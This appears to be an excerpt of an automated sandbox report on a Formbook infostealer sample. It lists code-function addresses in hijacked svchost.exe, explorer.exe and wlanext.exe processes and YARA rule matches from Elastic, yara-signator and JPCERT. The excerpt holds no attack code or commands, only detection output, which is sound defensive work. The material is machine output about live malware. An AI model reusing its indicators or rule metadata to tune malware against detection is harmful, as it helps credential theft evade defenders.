          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F452A01_2_02F452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F8739A1_2_02F8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2D34C1_2_02F2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024910301_2_02491030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE7A41_2_024AE7A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02499E5C1_2_02499E5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02499E601_2_02499E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024ADF131_2_024ADF13
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02492FB01_2_02492FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AEDDB1_2_024AEDDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02492D871_2_02492D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02492D901_2_02492D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0A0361_2_02E0A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0B2321_2_02E0B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E010821_2_02E01082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0E5CD1_2_02E0E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E05B301_2_02E05B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E05B321_2_02E05B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E089121_2_02E08912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E02D021_2_02E02D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BB2322_2_0E5BB232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BA0362_2_0E5BA036
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B10822_2_0E5B1082
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B89122_2_0E5B8912
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B2D022_2_0E5B2D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B5B322_2_0E5B5B32
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5B5B302_2_0E5B5B30
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BE5CD2_2_0E5BE5CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63BB322_2_0F63BB32
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63BB302_2_0F63BB30
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6412322_2_0F641232
          Source: C:\Windows\explorer.exeCode function: 2_2_0F638D022_2_0F638D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0F63E9122_2_0F63E912
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6445CD2_2_0F6445CD
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6400362_2_0F640036
          Source: C:\Windows\explorer.exeCode function: 2_2_0F6370822_2_0F637082
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332A3524_2_0332A352
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033303E64_2_033303E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0327E3F04_2_0327E3F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033102744_2_03310274
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032F02C04_2_032F02C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032601004_2_03260100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0330A1184_2_0330A118
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032F81584_2_032F8158
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033241A24_2_033241A2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033301AA4_2_033301AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033281CC4_2_033281CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033020004_2_03302000
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032707704_2_03270770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032947504_2_03294750
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0326C7C04_2_0326C7C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328C6E04_2_0328C6E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032705354_2_03270535
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033305914_2_03330591
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033144204_2_03314420
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033224464_2_03322446
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0331E4F64_2_0331E4F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332AB404_2_0332AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03326BD74_2_03326BD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0326EA804_2_0326EA80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032869624_2_03286962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032729A04_2_032729A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0333A9A64_2_0333A9A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032728404_2_03272840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0327A8404_2_0327A840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032568B84_2_032568B8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0329E8F04_2_0329E8F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03312F304_2_03312F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032B2F284_2_032B2F28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03290F304_2_03290F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032E4F404_2_032E4F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032EEFA04_2_032EEFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03262FC84_2_03262FC8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332EE264_2_0332EE26
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03270E594_2_03270E59
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332CE934_2_0332CE93
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03282E904_2_03282E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332EEDB4_2_0332EEDB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0327AD004_2_0327AD00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0330CD1F4_2_0330CD1F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03288DBF4_2_03288DBF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0326ADE04_2_0326ADE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03270C004_2_03270C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03310CB54_2_03310CB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03260CF24_2_03260CF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332132D4_2_0332132D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0325D34C4_2_0325D34C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032B739A4_2_032B739A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032752A04_2_032752A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328D2F04_2_0328D2F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033112ED4_2_033112ED
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328B2C04_2_0328B2C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A516C4_2_032A516C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0325F1724_2_0325F172
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0333B16B4_2_0333B16B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0327B1B04_2_0327B1B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332F0E04_2_0332F0E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033270E94_2_033270E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032770C04_2_032770C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0331F0CC4_2_0331F0CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332F7B04_2_0332F7B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032B56304_2_032B5630
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033216CC4_2_033216CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033275714_2_03327571
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0330D5B04_2_0330D5B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033395C34_2_033395C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332F43F4_2_0332F43F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032614604_2_03261460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332FB764_2_0332FB76
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328FB804_2_0328FB80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032ADBF94_2_032ADBF9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032E5BF04_2_032E5BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032E3A6C4_2_032E3A6C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03327A464_2_03327A46
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332FA494_2_0332FA49
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032B5AA04_2_032B5AA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03311AA34_2_03311AA3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0330DAAC4_2_0330DAAC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0331DAC64_2_0331DAC6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_033059104_2_03305910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032799504_2_03279950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328B9504_2_0328B950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032DD8004_2_032DD800
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032738E04_2_032738E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332FF094_2_0332FF09
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332FFB14_2_0332FFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03271F924_2_03271F92
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03233FD24_2_03233FD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03233FD54_2_03233FD5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03279EB04_2_03279EB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03327D734_2_03327D73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03273D404_2_03273D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03321D5A4_2_03321D5A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0328FDC04_2_0328FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032E9C324_2_032E9C32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0332FCF24_2_0332FCF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABE7A44_2_00ABE7A4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00AA2D874_2_00AA2D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00AA2D904_2_00AA2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00AA9E604_2_00AA9E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00AA9E5C4_2_00AA9E5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00AA2FB04_2_00AA2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0309A0364_2_0309A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03095B304_2_03095B30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03095B324_2_03095B32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0309B2324_2_0309B232
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030989124_2_03098912
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030910824_2_03091082
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03092D024_2_03092D02
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0309E5CD4_2_0309E5CD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032B7E54 appears 107 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032EF290 appears 103 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032DEA12 appears 86 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032A5130 appears 58 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0325B970 appears 262 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00DD650B appears 97 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 57 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 98 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 257 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EDEC2F appears 68 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EEF8A0 appears 35 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EE6AC0 appears 42 times
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
          Source: file.exe, 00000000.00000003.1653421088.0000000003BBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
          Source: file.exe, 00000000.00000003.1652908922.0000000003A13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
